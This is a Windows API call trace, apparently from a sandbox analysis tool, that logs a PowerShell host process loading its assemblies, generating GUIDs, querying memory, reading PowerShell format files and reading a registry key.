	[0804.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ac690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0804.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x1ac690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0804.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0804.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0804.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0804.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0804.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0805.224] VirtualQuery (in: lpAddress=0x1abca0, lpBuffer=0x1acb60, dwLength=0x30 | out: lpBuffer=0x1acb60*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0805.225] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xea099811, Data2=0xd8ba, Data3=0x4eff, Data4=([0]=0xb3, [1]=0x90, [2]=0xc2, [3]=0xe4, [4]=0x25, [5]=0x64, [6]=0x26, [7]=0xdc))) returned 0x0
	[0805.226] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x71a0e381, Data2=0x1678, Data3=0x4740, Data4=([0]=0xa3, [1]=0xd5, [2]=0xb8, [3]=0xad, [4]=0xcb, [5]=0xfa, [6]=0x3, [7]=0x79))) returned 0x0
	[0805.226] VirtualQuery (in: lpAddress=0x1abe50, lpBuffer=0x1acd10, dwLength=0x30 | out: lpBuffer=0x1acd10*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0805.227] VirtualQuery (in: lpAddress=0x1abe50, lpBuffer=0x1acd10, dwLength=0x30 | out: lpBuffer=0x1acd10*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0805.228] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x8d364f4f, Data2=0x3db2, Data3=0x46f8, Data4=([0]=0x86, [1]=0xb3, [2]=0xba, [3]=0xe0, [4]=0x5b, [5]=0xad, [6]=0x90, [7]=0xd2))) returned 0x0
	[0805.231] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x7b0d9364, Data2=0xdcf8, Data3=0x4143, Data4=([0]=0x92, [1]=0x79, [2]=0x43, [3]=0x5b, [4]=0x75, [5]=0x8a, [6]=0x2d, [7]=0x64))) returned 0x0
	[0805.231] VirtualQuery (in: lpAddress=0x1ac0a0, lpBuffer=0x1acf60, dwLength=0x30 | out: lpBuffer=0x1acf60*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0805.232] VirtualQuery (in: lpAddress=0x1abde0, lpBuffer=0x1acca0, dwLength=0x30 | out: lpBuffer=0x1acca0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0805.232] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x5a6f123e, Data2=0xea0a, Data3=0x46e5, Data4=([0]=0xa9, [1]=0xd1, [2]=0x88, [3]=0x9a, [4]=0x4c, [5]=0x3c, [6]=0x63, [7]=0x27))) returned 0x0
	[0805.233] VirtualQuery (in: lpAddress=0x1ab710, lpBuffer=0x1ac5d0, dwLength=0x30 | out: lpBuffer=0x1ac5d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0805.233] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xba5967e4, Data2=0x2947, Data3=0x4c9c, Data4=([0]=0x8b, [1]=0xc8, [2]=0x42, [3]=0xe9, [4]=0xd6, [5]=0xf9, [6]=0x67, [7]=0x34))) returned 0x0
	[0805.233] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xfe9b52d2, Data2=0xe575, Data3=0x4828, Data4=([0]=0x93, [1]=0xc1, [2]=0x36, [3]=0xdf, [4]=0x9, [5]=0x3f, [6]=0xbb, [7]=0xaa))) returned 0x0
	[0805.233] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0805.233] GetFileType (hFile=0x304) returned 0x1
	[0805.233] SetErrorMode (uMode=0x1) returned 0x1
	[0805.233] GetFileType (hFile=0x304) returned 0x1
	[0805.234] ReadFile (in: hFile=0x304, lpBuffer=0x33d8c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x33d8c10*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0805.235] ReadFile (in: hFile=0x304, lpBuffer=0x33d8c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x33d8c10*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0805.235] ReadFile (in: hFile=0x304, lpBuffer=0x33d8c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x33d8c10*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0805.235] ReadFile (in: hFile=0x304, lpBuffer=0x33d8c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x33d8c10*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0805.235] ReadFile (in: hFile=0x304, lpBuffer=0x33d8c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x33d8c10*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0805.235] ReadFile (in: hFile=0x304, lpBuffer=0x33d8c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x33d8c10*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0805.236] ReadFile (in: hFile=0x304, lpBuffer=0x33d8c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x33d8c10*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0805.236] ReadFile (in: hFile=0x304, lpBuffer=0x33d8c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x33d8c10*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0805.237] ReadFile (in: hFile=0x304, lpBuffer=0x33d8c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x33d8c10*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0805.238] ReadFile (in: hFile=0x304, lpBuffer=0x33d8c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x33d8c10*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0805.238] ReadFile (in: hFile=0x304, lpBuffer=0x33d8c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x33d8c10*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0805.239] ReadFile (in: hFile=0x304, lpBuffer=0x33d8c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x33d8c10*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0805.239] ReadFile (in: hFile=0x304, lpBuffer=0x33d8c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x33d8c10*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0805.239] ReadFile (in: hFile=0x304, lpBuffer=0x33d8c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x33d8c10*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0805.240] ReadFile (in: hFile=0x304, lpBuffer=0x33d8c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x33d8c10*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0805.240] ReadFile (in: hFile=0x304, lpBuffer=0x33d8c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x33d8c10*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.242] ReadFile (in: hFile=0x304, lpBuffer=0x33d8c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x33d8c10*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0806.243] ReadFile (in: hFile=0x304, lpBuffer=0x33d8c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x33d8c10*, lpNumberOfBytesRead=0x1ad178*=0xbce, lpOverlapped=0x0) returned 1
	[0806.243] ReadFile (in: hFile=0x304, lpBuffer=0x33d8346, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x33d8346*, lpNumberOfBytesRead=0x1ad178*=0x0, lpOverlapped=0x0) returned 1
	[0806.243] ReadFile (in: hFile=0x304, lpBuffer=0x33d8c10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x33d8c10*, lpNumberOfBytesRead=0x1ad178*=0x0, lpOverlapped=0x0) returned 1
	[0806.243] CloseHandle (hObject=0x304) returned 1
	[0806.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0806.244] SetErrorMode (uMode=0x1) returned 0x1
	[0806.244] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad120 | out: lpFileInformation=0x1ad120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0806.244] SetErrorMode (uMode=0x1) returned 0x1
	[0806.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0806.244] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad208 | out: phkResult=0x1ad208*=0x304) returned 0x0
	[0806.244] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad18c, lpData=0x0, lpcbData=0x1ad188*=0x0 | out: lpType=0x1ad18c*=0x1, lpData=0x0, lpcbData=0x1ad188*=0x56) returned 0x0
	[0806.245] CoTaskMemAlloc (cb=0x5a) returned 0x3c6230
	[0806.245] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad15c, lpData=0x3c6230, lpcbData=0x1ad158*=0x56 | out: lpType=0x1ad15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad158*=0x56) returned 0x0
	[0806.245] CoTaskMemFree (pv=0x3c6230) 
	[0806.245] RegCloseKey (hKey=0x304) returned 0x0
	[0806.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0806.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0806.246] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xcd62eb00, Data2=0xfe74, Data3=0x407f, Data4=([0]=0x99, [1]=0x24, [2]=0x92, [3]=0xba, [4]=0x9a, [5]=0xb2, [6]=0x52, [7]=0x85))) returned 0x0
	[0806.247] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xc451c8f7, Data2=0xef99, Data3=0x40da, Data4=([0]=0xa9, [1]=0x6a, [2]=0xc2, [3]=0x95, [4]=0xab, [5]=0x25, [6]=0x76, [7]=0x43))) returned 0x0
	[0806.247] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xe46f47df, Data2=0xde7a, Data3=0x4e50, Data4=([0]=0x87, [1]=0xcf, [2]=0x37, [3]=0x0, [4]=0x14, [5]=0xdf, [6]=0xdb, [7]=0x5c))) returned 0x0
	[0806.247] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x5ecd664d, Data2=0xa080, Data3=0x44af, Data4=([0]=0x88, [1]=0x74, [2]=0x90, [3]=0xbf, [4]=0x60, [5]=0x27, [6]=0x8, [7]=0x19))) returned 0x0
	[0806.247] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x9b6b8140, Data2=0x9ef6, Data3=0x40aa, Data4=([0]=0x83, [1]=0x6, [2]=0xde, [3]=0x8f, [4]=0xac, [5]=0x7, [6]=0x26, [7]=0x5f))) returned 0x0
	[0806.247] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xf2a4475d, Data2=0xca91, Data3=0x401c, Data4=([0]=0xa2, [1]=0x59, [2]=0x22, [3]=0xe6, [4]=0x24, [5]=0xdb, [6]=0x88, [7]=0x39))) returned 0x0
	[0806.247] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x20d5bd95, Data2=0x1348, Data3=0x4356, Data4=([0]=0x86, [1]=0x9a, [2]=0x66, [3]=0xdf, [4]=0x74, [5]=0xd3, [6]=0x8f, [7]=0xe0))) returned 0x0
	[0806.248] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x4ca1f424, Data2=0x8b22, Data3=0x4f7e, Data4=([0]=0x8e, [1]=0xb8, [2]=0x47, [3]=0xd2, [4]=0x94, [5]=0x53, [6]=0x60, [7]=0xd5))) returned 0x0
	[0806.248] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x86ba1fc1, Data2=0x2449, Data3=0x452d, Data4=([0]=0x88, [1]=0x74, [2]=0xb3, [3]=0xb, [4]=0xfd, [5]=0x14, [6]=0x7e, [7]=0x8b))) returned 0x0
	[0806.248] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xe704315e, Data2=0x8191, Data3=0x4a03, Data4=([0]=0x80, [1]=0x42, [2]=0x67, [3]=0x55, [4]=0x69, [5]=0x63, [6]=0x1, [7]=0xfb))) returned 0x0
	[0806.248] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x1e62d45e, Data2=0x95db, Data3=0x44ae, Data4=([0]=0x95, [1]=0x2d, [2]=0x93, [3]=0xb, [4]=0xe5, [5]=0x3a, [6]=0x4a, [7]=0xe2))) returned 0x0
	[0806.248] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xa9fd6b8a, Data2=0x5bee, Data3=0x4698, Data4=([0]=0xb3, [1]=0x2, [2]=0x8f, [3]=0x7e, [4]=0x2b, [5]=0x30, [6]=0x62, [7]=0xbc))) returned 0x0
	[0806.249] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xaf003a20, Data2=0x1a65, Data3=0x48a8, Data4=([0]=0xb8, [1]=0x1b, [2]=0x6f, [3]=0xbd, [4]=0x52, [5]=0xfd, [6]=0x4, [7]=0xb5))) returned 0x0
	[0806.249] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x52f65b84, Data2=0xed03, Data3=0x48a2, Data4=([0]=0x8a, [1]=0xb8, [2]=0xff, [3]=0xf, [4]=0xd0, [5]=0xa9, [6]=0x34, [7]=0xf6))) returned 0x0
	[0806.249] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x2577a10b, Data2=0x6424, Data3=0x42c6, Data4=([0]=0xac, [1]=0x2e, [2]=0x69, [3]=0x41, [4]=0x2f, [5]=0x2c, [6]=0x21, [7]=0xbf))) returned 0x0
	[0806.249] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xfbd3d599, Data2=0x4e03, Data3=0x4c59, Data4=([0]=0xa9, [1]=0x92, [2]=0x93, [3]=0x9, [4]=0x4f, [5]=0xd1, [6]=0xbb, [7]=0x7d))) returned 0x0
	[0806.249] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x747ad234, Data2=0x36dd, Data3=0x4b10, Data4=([0]=0x96, [1]=0x13, [2]=0x86, [3]=0x5d, [4]=0x5a, [5]=0x9f, [6]=0x5d, [7]=0xed))) returned 0x0
	[0806.249] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xffc8e9ed, Data2=0x19f, Data3=0x412f, Data4=([0]=0x87, [1]=0x1f, [2]=0xbc, [3]=0x70, [4]=0xa, [5]=0xef, [6]=0xf7, [7]=0x81))) returned 0x0
	[0806.249] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x7950f501, Data2=0xd4c5, Data3=0x4928, Data4=([0]=0x85, [1]=0xf3, [2]=0x21, [3]=0x6c, [4]=0xcd, [5]=0x39, [6]=0xed, [7]=0x8c))) returned 0x0
	[0806.250] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x91dd0344, Data2=0xe48e, Data3=0x4fd1, Data4=([0]=0x92, [1]=0xbc, [2]=0xf2, [3]=0xf7, [4]=0x80, [5]=0xd2, [6]=0xaf, [7]=0xf3))) returned 0x0
	[0806.250] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xf244305b, Data2=0xfd6e, Data3=0x4eaf, Data4=([0]=0xb2, [1]=0x3d, [2]=0x1b, [3]=0xa7, [4]=0x64, [5]=0xaf, [6]=0x56, [7]=0x4b))) returned 0x0
	[0806.250] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xe51b59ce, Data2=0x6cc1, Data3=0x4aa3, Data4=([0]=0x97, [1]=0x21, [2]=0x47, [3]=0x3c, [4]=0xc2, [5]=0x46, [6]=0x29, [7]=0x6))) returned 0x0
	[0806.250] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xabb27b53, Data2=0x1f41, Data3=0x4e07, Data4=([0]=0xbe, [1]=0xc0, [2]=0x66, [3]=0x7a, [4]=0x27, [5]=0x59, [6]=0xe4, [7]=0x49))) returned 0x0
	[0806.250] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x4196d3ed, Data2=0x60b5, Data3=0x4706, Data4=([0]=0x9f, [1]=0xc4, [2]=0xf7, [3]=0x26, [4]=0x4b, [5]=0x9a, [6]=0x3d, [7]=0xa5))) returned 0x0
	[0806.250] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xcb936102, Data2=0xe04f, Data3=0x438b, Data4=([0]=0xaf, [1]=0x9b, [2]=0xcd, [3]=0x88, [4]=0xe4, [5]=0x6d, [6]=0xe4, [7]=0x36))) returned 0x0
	[0806.250] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xc48b06dd, Data2=0xdf7f, Data3=0x46b4, Data4=([0]=0xb0, [1]=0x82, [2]=0x8d, [3]=0x36, [4]=0x45, [5]=0xaa, [6]=0x2d, [7]=0x80))) returned 0x0
	[0806.251] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xe6a84b9e, Data2=0xfec2, Data3=0x4e05, Data4=([0]=0x96, [1]=0x5c, [2]=0xa5, [3]=0xac, [4]=0xf3, [5]=0x68, [6]=0xf4, [7]=0x46))) returned 0x0
	[0806.251] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xd12377a8, Data2=0xe368, Data3=0x4db2, Data4=([0]=0x85, [1]=0x40, [2]=0x20, [3]=0x30, [4]=0x3a, [5]=0x8d, [6]=0x99, [7]=0xf5))) returned 0x0
	[0806.251] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x93e81afa, Data2=0x1a28, Data3=0x4f47, Data4=([0]=0xa7, [1]=0xf, [2]=0x47, [3]=0xba, [4]=0x2e, [5]=0xb6, [6]=0x43, [7]=0x54))) returned 0x0
	[0806.251] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xa0a1facc, Data2=0xf373, Data3=0x4d2c, Data4=([0]=0xb9, [1]=0x8c, [2]=0x37, [3]=0xb6, [4]=0x55, [5]=0x1d, [6]=0xab, [7]=0x44))) returned 0x0
	[0806.251] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x33033178, Data2=0x17b4, Data3=0x4467, Data4=([0]=0xbd, [1]=0xda, [2]=0x7, [3]=0x5e, [4]=0x13, [5]=0xb4, [6]=0xb4, [7]=0xd8))) returned 0x0
	[0806.251] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x1e4d951d, Data2=0x1639, Data3=0x430c, Data4=([0]=0x88, [1]=0x13, [2]=0x81, [3]=0x60, [4]=0x5d, [5]=0x7d, [6]=0x28, [7]=0x29))) returned 0x0
	[0806.251] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x2d824eb9, Data2=0xfcba, Data3=0x4fed, Data4=([0]=0x82, [1]=0xb1, [2]=0x4f, [3]=0xca, [4]=0xb4, [5]=0x93, [6]=0x7b, [7]=0xad))) returned 0x0
	[0806.252] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x32841a8a, Data2=0x9ddd, Data3=0x4ba6, Data4=([0]=0x83, [1]=0x92, [2]=0xd9, [3]=0x54, [4]=0x8d, [5]=0x20, [6]=0xb5, [7]=0x74))) returned 0x0
	[0806.252] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xe5af0ea, Data2=0x9405, Data3=0x4627, Data4=([0]=0x98, [1]=0xa0, [2]=0xe1, [3]=0xe8, [4]=0x91, [5]=0xe8, [6]=0x46, [7]=0xe1))) returned 0x0
	[0806.252] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x8afa37fa, Data2=0x469, Data3=0x459b, Data4=([0]=0xa6, [1]=0x32, [2]=0xb6, [3]=0x2a, [4]=0xc1, [5]=0x84, [6]=0xb5, [7]=0xd4))) returned 0x0
	[0806.252] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x39fed952, Data2=0x83d7, Data3=0x41e0, Data4=([0]=0xba, [1]=0xfe, [2]=0xb9, [3]=0x99, [4]=0x82, [5]=0x60, [6]=0x1, [7]=0x5e))) returned 0x0
	[0806.253] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0806.253] GetFileType (hFile=0x304) returned 0x1
	[0806.253] SetErrorMode (uMode=0x1) returned 0x1
	[0806.253] GetFileType (hFile=0x304) returned 0x1
	[0806.253] ReadFile (in: hFile=0x304, lpBuffer=0x34ea2f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x34ea2f0*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
